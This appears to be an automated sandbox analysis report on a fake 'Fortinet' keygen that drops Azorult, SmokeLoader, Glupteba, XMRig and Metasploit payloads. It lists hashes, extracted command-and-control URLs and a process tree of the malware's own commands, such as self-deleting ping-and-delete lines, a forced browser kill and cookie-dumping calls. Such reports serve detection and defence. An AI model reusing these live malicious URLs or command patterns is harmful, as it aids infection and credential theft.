azorult | 9fbd5913d78150df75e9024f2432697c72249dc844e36c9b4e19a5226f9624f8

Analysis

max time kernel
18s
max time network
305s
platform
windows10_x64
resource
win10v20201028
submitted
02-04-2021 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fortinet.v1.0.keygen.exe
Size

5.4MB
MD5

2a2be5dbf78e57ac4fd460faa2a52488
SHA1

8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
SHA256

b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
SHA512

8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038

Score

10^/10

azorult glupteba metasploit smokeloader xmrig backdoor dropper infostealer loader miner trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral3/memory/5332-236-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/5332-243-0x00000000050A0000-0x00000000059AA000-memory.dmp	family_glupteba
behavioral3/memory/5332-245-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 4 IoCs

miner

resource	yara_rule
behavioral3/memory/3648-227-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/3648-228-0x00000001402CA898-mapping.dmp	xmrig
behavioral3/memory/3648-230-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/3648-261-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 11 IoCs

pid	Process
1504	keygen-pr.exe
3656	keygen-step-1.exe
804	keygen-step-3.exe
3448	keygen-step-4.exe
2360	key.exe
2092	Setup.exe
3424	key.exe
4080	multitimer.exe
1004	setups.exe
1532	setups.tmp
1148	askinstall20.exe

Loads dropped DLL 7 IoCs

pid	Process
1532	setups.tmp
1532	setups.tmp
1532	setups.tmp
1532	setups.tmp
1532	setups.tmp
1532	setups.tmp
1532	setups.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
270	ipinfo.io
274	ipinfo.io
409	api.ipify.org
111	api.ipify.org
129	ipinfo.io
131	ipinfo.io
174	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2360 set thread context of 3424	2360	key.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 24 IoCs

pid	pid_target	Process	procid_target
4412	752	WerFault.exe	119
5288	752	WerFault.exe	119
4980	752	WerFault.exe	119
5012	752	WerFault.exe	119
4056	752	WerFault.exe	119
4836	752	WerFault.exe	119
4420	752	WerFault.exe	119
6296	6276	WerFault.exe	231
6220	6276	WerFault.exe	231
7152	6276	WerFault.exe	231
6236	6276	WerFault.exe	231
7260	6276	WerFault.exe	231
3500	6276	WerFault.exe	231
7264	6276	WerFault.exe	231
4660	6012	WerFault.exe	139
7852	6084	WerFault.exe	166
4228	6084	WerFault.exe	166
8332	6084	WerFault.exe	166
9112	6084	WerFault.exe	166
8664	6084	WerFault.exe	166
4092	6084	WerFault.exe	166
9108	6084	WerFault.exe	166
4528	6084	WerFault.exe	166
8360	6084	WerFault.exe	166

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6900	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
4248	taskkill.exe
8004	taskkill.exe
5436	taskkill.exe
7480	taskkill.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
2832	PING.EXE
5864	PING.EXE
4992	PING.EXE
5124	PING.EXE
9080	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	271	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	286	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	130	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1532	setups.tmp
1532	setups.tmp

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2092	Setup.exe
Token: SeCreateTokenPrivilege	1148	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	1148	askinstall20.exe
Token: SeLockMemoryPrivilege	1148	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	1148	askinstall20.exe
Token: SeMachineAccountPrivilege	1148	askinstall20.exe
Token: SeTcbPrivilege	1148	askinstall20.exe
Token: SeSecurityPrivilege	1148	askinstall20.exe
Token: SeTakeOwnershipPrivilege	1148	askinstall20.exe
Token: SeLoadDriverPrivilege	1148	askinstall20.exe
Token: SeSystemProfilePrivilege	1148	askinstall20.exe
Token: SeSystemtimePrivilege	1148	askinstall20.exe
Token: SeProfSingleProcessPrivilege	1148	askinstall20.exe
Token: SeIncBasePriorityPrivilege	1148	askinstall20.exe
Token: SeCreatePagefilePrivilege	1148	askinstall20.exe
Token: SeCreatePermanentPrivilege	1148	askinstall20.exe
Token: SeBackupPrivilege	1148	askinstall20.exe
Token: SeRestorePrivilege	1148	askinstall20.exe
Token: SeShutdownPrivilege	1148	askinstall20.exe
Token: SeDebugPrivilege	1148	askinstall20.exe
Token: SeAuditPrivilege	1148	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	1148	askinstall20.exe
Token: SeChangeNotifyPrivilege	1148	askinstall20.exe
Token: SeRemoteShutdownPrivilege	1148	askinstall20.exe
Token: SeUndockPrivilege	1148	askinstall20.exe
Token: SeSyncAgentPrivilege	1148	askinstall20.exe
Token: SeEnableDelegationPrivilege	1148	askinstall20.exe
Token: SeManageVolumePrivilege	1148	askinstall20.exe
Token: SeImpersonatePrivilege	1148	askinstall20.exe
Token: SeCreateGlobalPrivilege	1148	askinstall20.exe
Token: 31	1148	askinstall20.exe
Token: 32	1148	askinstall20.exe
Token: 33	1148	askinstall20.exe
Token: 34	1148	askinstall20.exe
Token: 35	1148	askinstall20.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1004	setups.exe
1532	setups.tmp

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 2012	1032	Fortinet.v1.0.keygen.exe	79
PID 1032 wrote to memory of 2012	1032	Fortinet.v1.0.keygen.exe	79
PID 1032 wrote to memory of 2012	1032	Fortinet.v1.0.keygen.exe	79
PID 2012 wrote to memory of 1504	2012	cmd.exe	82
PID 2012 wrote to memory of 1504	2012	cmd.exe	82
PID 2012 wrote to memory of 1504	2012	cmd.exe	82
PID 2012 wrote to memory of 3656	2012	cmd.exe	83
PID 2012 wrote to memory of 3656	2012	cmd.exe	83
PID 2012 wrote to memory of 3656	2012	cmd.exe	83
PID 2012 wrote to memory of 804	2012	cmd.exe	84
PID 2012 wrote to memory of 804	2012	cmd.exe	84
PID 2012 wrote to memory of 804	2012	cmd.exe	84
PID 2012 wrote to memory of 3448	2012	cmd.exe	85
PID 2012 wrote to memory of 3448	2012	cmd.exe	85
PID 2012 wrote to memory of 3448	2012	cmd.exe	85
PID 1504 wrote to memory of 2360	1504	keygen-pr.exe	86
PID 1504 wrote to memory of 2360	1504	keygen-pr.exe	86
PID 1504 wrote to memory of 2360	1504	keygen-pr.exe	86
PID 3448 wrote to memory of 2092	3448	keygen-step-4.exe	87
PID 3448 wrote to memory of 2092	3448	keygen-step-4.exe	87
PID 804 wrote to memory of 2100	804	keygen-step-3.exe	88
PID 804 wrote to memory of 2100	804	keygen-step-3.exe	88
PID 804 wrote to memory of 2100	804	keygen-step-3.exe	88
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2360 wrote to memory of 3424	2360	key.exe	90
PID 2100 wrote to memory of 2832	2100	cmd.exe	92
PID 2100 wrote to memory of 2832	2100	cmd.exe	92
PID 2100 wrote to memory of 2832	2100	cmd.exe	92
PID 2092 wrote to memory of 4080	2092	Setup.exe	93
PID 2092 wrote to memory of 4080	2092	Setup.exe	93
PID 2092 wrote to memory of 1004	2092	Setup.exe	94
PID 2092 wrote to memory of 1004	2092	Setup.exe	94
PID 2092 wrote to memory of 1004	2092	Setup.exe	94
PID 3448 wrote to memory of 1148	3448	keygen-step-4.exe	95
PID 3448 wrote to memory of 1148	3448	keygen-step-4.exe	95
PID 3448 wrote to memory of 1148	3448	keygen-step-4.exe	95
PID 1004 wrote to memory of 1532	1004	setups.exe	96
PID 1004 wrote to memory of 1532	1004	setups.exe	96
PID 1004 wrote to memory of 1532	1004	setups.exe	96

C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:3424
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3656
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:804
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2832
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2092
    - - C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        
        PID:4080
      - C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 1 3.1617397882.6067887a94d46 101
        6⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 2 3.1617397882.6067887a94d46
        7⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\tbijhciozew\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tbijhciozew\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        10⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        10⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        10⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        11⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\gpj5ezoi0py\fosbnu4ulj4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gpj5ezoi0py\fosbnu4ulj4.exe" /ustwo INSTALL
        8⤵
        
        PID:752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 652
        9⤵
        Program crash
        
        PID:4412
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 664
        9⤵
        Program crash
        
        PID:5288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 636
        9⤵
        Program crash
        
        PID:4980
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 820
        9⤵
        Program crash
        
        PID:5012
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 876
        9⤵
        Program crash
        
        PID:4056
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 924
        9⤵
        Program crash
        
        PID:4836
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 864
        9⤵
        Program crash
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\z4qineeblhb\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z4qineeblhb\KiffApp1.exe"
        8⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\is-FSR4A.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FSR4A.tmp\Setup3310.tmp" /SL5="$40202,138429,56832,C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\is-AA9BH.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-AA9BH.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5608
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4812
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 908
        12⤵
        Program crash
        
        PID:7852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1004
        12⤵
        Program crash
        
        PID:4228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1048
        12⤵
        Program crash
        
        PID:8332
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1084
        12⤵
        Program crash
        
        PID:9112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1096
        12⤵
        Program crash
        
        PID:8664
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1124
        12⤵
        Program crash
        
        PID:4092
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1172
        12⤵
        Program crash
        
        PID:9108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1488
        12⤵
        Program crash
        
        PID:4528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1556
        12⤵
        Program crash
        
        PID:8360
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:6044
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\is-504UJ.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-504UJ.tmp\LabPicV3.tmp" /SL5="$20408,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\is-Q40KJ.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q40KJ.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:4228
        
        C:\Program Files\Java\TMABMYFVSO\prolab.exe
        
        "C:\Program Files\Java\TMABMYFVSO\prolab.exe" /VERYSILENT
        14⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\is-FMV8N.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FMV8N.tmp\prolab.tmp" /SL5="$40306,575243,216576,C:\Program Files\Java\TMABMYFVSO\prolab.exe" /VERYSILENT
        15⤵
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\d6-29045-792-4c4b7-3577fdf3b9533\Fajudevyshu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d6-29045-792-4c4b7-3577fdf3b9533\Fajudevyshu.exe"
        14⤵
        
        PID:4916
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exe & exit
        15⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exe
        16⤵
        
        PID:7024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe & exit
        15⤵
        
        PID:6904
        
        C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe
        16⤵
        
        PID:200
        
        C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe
        17⤵
        
        PID:7728
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exe & exit
        15⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exe
        16⤵
        
        PID:6164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exe & exit
        15⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exe
        16⤵
        
        PID:7928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\153stbbr.11l\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:6432
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exe /8-2222 & exit
        15⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exe /8-2222
        16⤵
        
        PID:3012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exe & exit
        15⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exe
        16⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        17⤵
        
        PID:8152
        
        C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 1 3.1617398060.6067892c63698 101
        19⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 2 3.1617398060.6067892c63698
        20⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\is-O8T42.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O8T42.tmp\Setup3310.tmp" /SL5="$702CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:8888
        
        C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe" /silent /subid=482
        21⤵
        
        PID:8928
        
        C:\Users\Admin\AppData\Local\Temp\is-43FJI.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-43FJI.tmp\vpn.tmp" /SL5="$2077E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe" /silent /subid=482
        22⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\is-F0LSK.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F0LSK.tmp\vict.tmp" /SL5="$2073E,870426,780800,C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\uprzmb3xuso\3uv4501luhz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uprzmb3xuso\3uv4501luhz.exe" /ustwo INSTALL
        21⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\cti030wi5yn\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cti030wi5yn\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\dhhjowotzfj\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dhhjowotzfj\app.exe" /8-23
        21⤵
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe" ll
        18⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\is-0MTBT.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0MTBT.tmp\setups.tmp" /SL5="$20666,635399,250368,C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe" ll
        19⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
        17⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        17⤵
        
        PID:6876
        
        C:\Users\Admin\AppData\Roaming\713F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\713F.tmp.exe"
        18⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Roaming\713F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\713F.tmp.exe"
        19⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Roaming\9081.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9081.tmp.exe"
        18⤵
        
        PID:9176
        
